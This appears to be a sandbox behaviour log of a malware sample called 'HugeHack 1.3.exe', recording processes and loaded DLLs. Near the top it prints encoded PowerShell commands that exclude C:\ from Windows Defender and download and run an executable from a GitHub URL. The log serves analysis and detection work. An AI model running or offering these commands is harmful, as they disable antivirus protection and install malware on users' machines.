Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d9.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwmapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d10warp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: resourcepolicyclient.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dxcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwrite.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dataexchange.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: d3d11.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dcomp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dxgi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: twinapi.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: textinputframework.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
